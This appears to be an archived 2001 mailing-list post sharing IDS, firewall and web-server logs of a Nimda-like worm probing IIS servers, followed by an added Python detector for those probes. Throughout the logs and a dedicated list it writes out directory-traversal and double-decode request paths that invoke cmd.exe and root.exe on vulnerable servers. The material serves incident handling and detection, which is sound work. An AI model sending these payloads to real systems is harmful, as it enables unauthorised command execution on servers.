I think the answer is yes. We are seeing the following information in our SOC:

Snort logs

[**] WEB-IIS cmd.exe access [**]
09/18-05:45:34.986956 0:1:64:F0:E4:54 -> 0:E0:18:C1:32:64 type:0x800 len:0x86
24.78.160.156:2199 -> 24.31.204.3:80 TCP TTL:114 TOS:0x0 ID:55463 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x258331C6  Ack: 0x3FFA2A2F  Win: 0x4470  TcpLen: 20
0x0000: 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010: 00 78 D8 A7 40 00 72 06 92 CB 18 4E A0 9C 18 1F  .x..@.r....N....
0x0020: CC 03 08 97 00 50 25 83 31 C6 3F FA 2A 2F 50 18  .....P%.1.?.*/P.
0x0030: 44 70 EF A3 00 00 47 45 54 20 2F 63 2F 77 69 6E  Dp....GET /c/win
0x0040: 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E  nt/system32/cmd.
0x0050: 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F  exe?/c+dir HTTP/
0x0060: 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host: www..
0x0070: 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection: clo
0x0080: 73 65 0D 0A 0D 0A                                se....

[**] WEB-IIS CodeRed v2 root.exe access [**]
09/18-05:48:52.527517 0:1:64:F0:E4:54 -> 0:E0:18:C1:32:64 type:0x800 len:0x7E
24.31.249.243:3944 -> 24.31.204.3:80 TCP TTL:119 TOS:0x0 ID:14269 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x5F36CF2E  Ack: 0x4C70EEFF  Win: 0x4470  TcpLen: 20
0x0000: 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010: 00 70 37 BD 40 00 77 06 D5 95 18 1F F9 F3 18 1F  .p7.@.w.........
0x0020: CC 03 0F 68 00 50 5F 36 CF 2E 4C 70 EE FF 50 18  ...h.P_6..Lp..P.
0x0030: 44 70 1E 7E 00 00 47 45 54 20 2F 73 63 72 69 70  Dp.~..GET /scrip
0x0040: 74 73 2F 72 6F 6F 74 2E 65 78 65 3F 2F 63 2B 64  ts/root.exe?/c+d
0x0050: 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73  ir HTTP/1.0..Hos
0x0060: 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74  t: www..Connnect
0x0070: 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A        ion: close....

[**] WEB-IIS multiple decode attempt [**]
09/18-05:37:53.664407 0:1:64:F0:E4:54 -> 0:E0:18:C1:32:64 type:0x800 len:0x96
24.148.70.192:3874 -> 24.31.204.3:80 TCP TTL:115 TOS:0x0 ID:47185 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0xF74A5E62  Ack: 0x22C29B6D  Win: 0x4470  TcpLen: 20
0x0000: 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010: 00 88 B8 51 40 00 73 06 0B A8 18 94 46 C0 18 1F  ...Q@.s.....F...
0x0020: CC 03 0F 22 00 50 F7 4A 5E 62 22 C2 9B 6D 50 18  ...".P.J^b"..mP.
0x0030: 44 70 BB B4 00 00 47 45 54 20 2F 73 63 72 69 70  Dp....GET /scrip
0x0040: 74 73 2F 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74  ts/..%5c../winnt
0x0050: 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78  /system32/cmd.ex
0x0060: 65 3F 2F 63 2B 64 69 72 20 72 20 48 54 54 50 2F  e?/c+dir r HTTP/
0x0070: 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host: www..
0x0080: 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection: clo
0x0090: 73 65 0D 0A 0D 0A                                se....

[**] WEB-IIS multiple decode attempt [**]
09/18-05:32:54.915136 0:1:64:F0:E4:54 -> 0:E0:18:C1:32:64 type:0x800 len:0xAB
24.31.191.150:2085 -> 24.31.204.3:80 TCP TTL:120 TOS:0x0 ID:57280 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x57D5CE8D  Ack: 0x10F1D744  Win: 0x4470  TcpLen: 20
0x0000: 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010: 00 9D DF C0 40 00 78 06 66 C2 18 1F BF 96 18 1F  ....@.x.f.......
0x0020: CC 03 08 25 00 50 57 D5 CE 8D 10 F1 D7 44 50 18  ...%.PW......DP.
0x0030: 44 70 95 DC 00 00 47 45 54 20 2F 5F 76 74 69 5F  Dp....GET /_vti_
0x0040: 62 69 6E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35  bin/..%5c../..%5
0x0050: 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E  c../..%5c../winn
0x0060: 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
0x0070: 78 65 3F 2F 63 2B 64 69 72 20 63 2B 64 69 72 20  xe?/c+dir c+dir 
0x0080: 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20  HTTP/1.0..Host: 
0x0090: 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E  www..Connnection
0x00A0: 3A 20 63 6C 6F 73 65 0D 0A 0D 0A                 : close....

[**] WEB-IIS cmd.exe access [**]
09/18-05:38:03.680933 0:1:64:F0:E4:54 -> 0:E0:18:C1:32:64 type:0x800 len:0x97
24.148.70.192:1184 -> 24.31.204.3:80 TCP TTL:115 TOS:0x0 ID:57825 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0xFA046B6A  Ack: 0x24060DCB  Win: 0x4470  TcpLen: 20
0x0000: 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010: 00 89 E1 E1 40 00 73 06 E2 16 18 94 46 C0 18 1F  ....@.s.....F...
0x0020: CC 03 04 A0 00 50 FA 04 6B 6A 24 06 0D CB 50 18  .....P..kj$...P.
0x0030: 44 70 CB F7 00 00 47 45 54 20 2F 73 63 72 69 70  Dp....GET /scrip
0x0040: 74 73 2F 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F  ts/..%c../winnt/
0x0050: 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65  system32/cmd.exe
0x0060: 3F 2F 63 2B 64 69 72 20 64 69 72 20 48 54 54 50  ?/c+dir dir HTTP
0x0070: 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D  /1.0..Host: www.
0x0080: 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C  .Connnection: cl
0x0090: 6F 73 65 0D 0A 0D 0A                             ose....

[**] WEB-IIS cmd.exe access [**]
09/18-05:27:51.049990 0:1:64:F0:E4:54 -> 0:E0:18:C1:32:64 type:0x800 len:0x96
24.31.144.95:2571 -> 24.31.204.3:80 TCP TTL:117 TOS:0x0 ID:35424 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x962131B0  Ack: 0xFDE60AF6  Win: 0x4470  TcpLen: 20
0x0000: 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010: 00 88 8A 60 40 00 75 06 EE 6E 18 1F 90 5F 18 1F  ...`@.u..n..._..
0x0020: CC 03 0A 0B 00 50 96 21 31 B0 FD E6 0A F6 50 18  .....P.!1.....P.
0x0030: 44 70 BD CC 00 00 47 45 54 20 2F 73 63 72 69 70  Dp....GET /scrip
0x0040: 74 73 2F 2E 2E 25 32 66 2E 2E 2F 77 69 6E 6E 74  ts/..%2f../winnt
0x0050: 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78  /system32/cmd.ex
0x0060: 65 3F 2F 63 2B 64 69 72 20 72 20 48 54 54 50 2F  e?/c+dir r HTTP/
0x0070: 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host: www..
0x0080: 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection: clo
0x0090: 73 65 0D 0A 0D 0A                                se....

Gauntlet Firewall Logs

Sep 18 08:31:49 customer.org http-gw[26495]: log host=nodnsquery/209.232.44.32 protocol=http cmd=get dest=X.X.X.X path=/c/winnt/system32/cmd.exe?/c+dir ID=26495154760
Sep 18 08:35:37 customer.org http-gw[24740]: log host=nodnsquery/208.223.178.253 protocol=http cmd=get dest=Y.Y.Y.Y path=/scripts/root.exe?/c+dir ID=24740140245

Possible worms performing all the old IIS exploits:

/MSADC/root.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/root.exe?/c+dir

This hasn't been confirmed yet, but we have heard information indicating that this worm might be infecting IIS servers with mobile code. When someone browses to an infected server, this code is downloaded to the browser. Once a browser is infected, this code might be infecting other IIS servers.
Billy Smith
Research and Development
LURHQ Corporation

At 09:43 AM 9/18/2001 -0500, Cory McIntire wrote:
>Hello,
>I and a few others I know are getting bombarded on our machines with IIS
>requests....looks like another worm, and it's much smarter than before, it
>seems to stay within the same class A and sometimes the same class B as the
>attacking machine is in. Here is an excerpt of what I believe is the full
>scan....
>
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>
>just thought I would let you guys know...this one looks bad fella.....thank
>god for apache.....that is of course, if there isn't a huge bog down on the
>net....=[
>
>cory
>
>-----------------------------------------------------------------
>This list is provided by the SecurityFocus ARIS analyzer service.
>For more information on this free incident handling, management
>and tracking system please see: http://aris.securityfocus.com
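As an added example (not code from either post, nor from LURHQ, Snort or SecurityFocus), here is a small scanner that runs over access-log lines modelled on the ones Cory quoted and flags the probe family Billy lists. The point it demonstrates is why the worm needs so many spellings of the same thing: IIS 4/5 percent-decoded a path, checked it, and then decoded it again (the "superfluous decode" bug, MS01-026), and separately accepted overlong two-byte UTF-8 (MS00-078), so "..%255c..", "..%%35%63..", "..%c1%1c.." and "..%c0%af.." all become "..\.." by the time the file is opened. The scanner reproduces that lenient decoding before matching, counts how many decode passes were needed, and resolves the traversal to the file that would actually run. The log lines are constructed for this example (the 10.0.0.7 line is an invented benign request); the rule names mirror the Snort alert names above, but the pass-count criterion for "multiple decode" is our own.

```python
"""Flag Nimda / Code Red II style IIS probes in Apache-format access logs.

Added example for this thread, not code from either post or from LURHQ or
Snort. Each request path is normalised the way a buggy IIS 4/5 handled it:
percent-decoding applied more than once (MS01-026) and overlong two-byte
UTF-8 folded to ASCII (MS00-078), so that every spelling of "..\\.." in the
thread collapses to one traversal before the cmd.exe / root.exe match.
"""
import re
from typing import List, Optional, Tuple

# Constructed sample: the first five lines follow the entries Cory quoted,
# the 10.0.0.7 line is an invented benign request with ".." only in the query.
SAMPLE_LOG = """\
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
10.0.0.7 - - [18/Sep/2001:09:40:01 -0500] "GET /scripts/status.asp?view=../docs HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
PCT = re.compile(rb'%([0-9A-Fa-f]{2})')
# A 0xC0/0xC1 lead byte plus one more byte can only encode ASCII, so strict
# UTF-8 rejects it; IIS accepted it and also ignored the continuation byte's
# high bits, which is how %c0%af and %c0%2f became '/' and %c1%1c, %c1%9c '\'.
OVERLONG = re.compile(rb'[\xc0\xc1](.)', re.S)


def fold_overlong(buf: bytes) -> bytes:
    """Decode overlong two-byte sequences the lenient way IIS did."""
    return OVERLONG.sub(
        lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)]),
        buf)


def iis_normalise(url: str, max_passes: int = 3) -> Tuple[str, int]:
    """Return (resolved path, number of decode passes that changed something).

    One pass is what a correct server does before its checks. IIS checked the
    once-decoded path and then decoded again, so ..%255c.. and ..%%35%63..
    only turn into ..\\.. on the second pass; the count exposes that.
    """
    buf = url.split('?', 1)[0].encode('latin-1', 'replace')
    passes = 0
    for _ in range(max_passes):
        decoded = fold_overlong(PCT.sub(lambda m: bytes([int(m.group(1), 16)]), buf))
        if decoded == buf:
            break
        buf, passes = decoded, passes + 1
    text = buf.decode('latin-1').replace('\\', '/').lower()
    parts: List[str] = []   # resolve dot segments: scripts/../winnt -> winnt
    for seg in text.split('/'):
        if seg == '..':
            if parts:
                parts.pop()
        elif seg not in ('', '.'):
            parts.append(seg)
    return '/' + '/'.join(parts), passes


def classify(url: str) -> Optional[Tuple[str, str, int]]:
    """Return (rule name, resolved path, passes) or None. Rule names mirror the
    Snort alerts quoted in the thread; the pass-count criterion is ours."""
    path, passes = iis_normalise(url)
    target = path.rsplit('/', 1)[-1]
    if target == 'root.exe':
        return 'WEB-IIS CodeRed v2 root.exe access', path, passes
    if target == 'cmd.exe':
        rule = 'WEB-IIS multiple decode attempt' if passes > 1 else 'WEB-IIS cmd.exe access'
        return rule, path, passes
    return None


def scan_log(text: str) -> List[dict]:
    """Parse common-log-format lines and return one record per flagged request."""
    hits = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        client, when, method, url, status = m.groups()
        verdict = classify(url)
        if verdict:
            rule, path, passes = verdict
            hits.append({'client': client, 'time': when, 'rule': rule, 'url': url,
                         'resolved': path, 'decode_passes': passes, 'status': int(status)})
    return hits


if __name__ == '__main__':
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['client']} {h['rule']} passes={h['decode_passes']} "
              f"{h['url']} -> {h['resolved']}")
```

Note the two 400 responses in Cory's log: Apache rejects "%%35%63" as a malformed escape outright, while IIS's whole problem was that it did not. The scanner decodes leniently on purpose so those lines are still flagged, and it leaves the query string ("/c+dir") out of the path normalisation so that ".." appearing only in a parameter, as in the benign sample line, does not count as a traversal.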
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 08:57:53 PDT